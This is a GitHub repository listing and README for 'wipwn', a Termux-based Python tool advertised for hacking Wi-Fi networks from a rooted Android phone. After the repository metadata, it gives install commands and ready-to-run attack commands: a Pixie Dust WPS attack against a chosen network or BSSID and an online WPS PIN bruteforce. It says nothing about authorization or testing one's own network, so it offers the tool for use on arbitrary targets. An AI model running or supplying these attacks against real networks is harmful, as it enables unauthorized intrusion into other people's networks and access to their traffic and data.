https://github.com/anbuinfosec/wipwn
Hack wifi using termux (rooted).
https://github.com/anbuinfosec/wipwn
anbuinfosec anbusec android-wifi-hacking hack-wifi hack-wifi-using-termux hack-wifi-with-phone illusionghost illusionghost3 termux-wifi-hack termux-wifi-hack-android wifi-hack-termux wifi-hacking wifi-hacking-android wifi-hacking-android-termux wifi-hacking-termux wifi-tool wipwn wipwn-github wpa xyrusinc
Last synced: 3 months ago
JSON representation
Hack wifi using termux (rooted).
- Host: GitHub
- URL: https://github.com/anbuinfosec/wipwn
- Owner: anbuinfosec
- License: mit
- Created: 2023-07-06T08:58:59.000Z (almost 2 years ago)
- Default Branch: main
- Last Pushed: 2025-01-13T01:38:13.000Z (4 months ago)
- Last Synced: 2025-01-13T02:33:55.594Z (4 months ago)
- Topics: anbuinfosec, anbusec, android-wifi-hacking, hack-wifi, hack-wifi-using-termux, hack-wifi-with-phone, illusionghost, illusionghost3, termux-wifi-hack, termux-wifi-hack-android, wifi-hack-termux, wifi-hacking, wifi-hacking-android, wifi-hacking-android-termux, wifi-hacking-termux, wifi-tool, wipwn, wipwn-github, wpa, xyrusinc
- Language: Python
- Homepage: https://anbuinfosec.github.io/wipwn/
- Size: 429 KB
- Stars: 180
- Watchers: 6
- Forks: 18
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# WIPWN

### Hack wifi using Termux (rooted)
- [Requirements]
- [Python](https://www.python.org)
- [Pixiewps](https://www.kali.org/tools/pixiewps/)
- [Wpa-supplicant](https://wiki.archlinux.org/title/wpa_supplicant)
### Installation :```bash
pkg update && pkg upgrade -y
pkg install root-repo -y
pkg install git tsu python wpa-supplicant pixiewps iw openssl -y
git clone https://github.com/anbuinfosec/wipwn
cd wipwn
chmod +x main.py
```#### Help : ```sudo python main --help```
#### Example : ```sudo python main.py -i wlan0 -K```#### Note:
+ **First turn off your Wifi.**
+ **Turn on Hotspot.**
+ **Turn on Location.**
- Show avaliable networks and start Pixie Dust attack on a specified network.
- ```sudo python main.py -i wlan0 -K```
- ```bash wipwn.sh```
- - Start Pixie Dust attack on a specified BSSID:
`sudo python main.py -i wlan0 -b 00:91:4C:C3:AC:28 -K`
- Launch online WPS bruteforce with the specified first half of the PIN:
- `sudo python main.py -i wlan0 -b 50:0F:F5:B0:08:05 -B -p 1234`
### Troubleshooting
**"Device or resource busy (-16)" - Turn on Wifi and Then Turn off Wifi.**---
## Screenshots
| Banner | Cracked | Saved Data | config.txt |
| :---: | :---: | :---: | :---: |
|  |  |  |  |### ❤️ Thanks for stars and forks
[](https://github.com/anbuinfosec/wipwn/stargazers)
[](https://github.com/anbuinfosec/wipwn/network/members)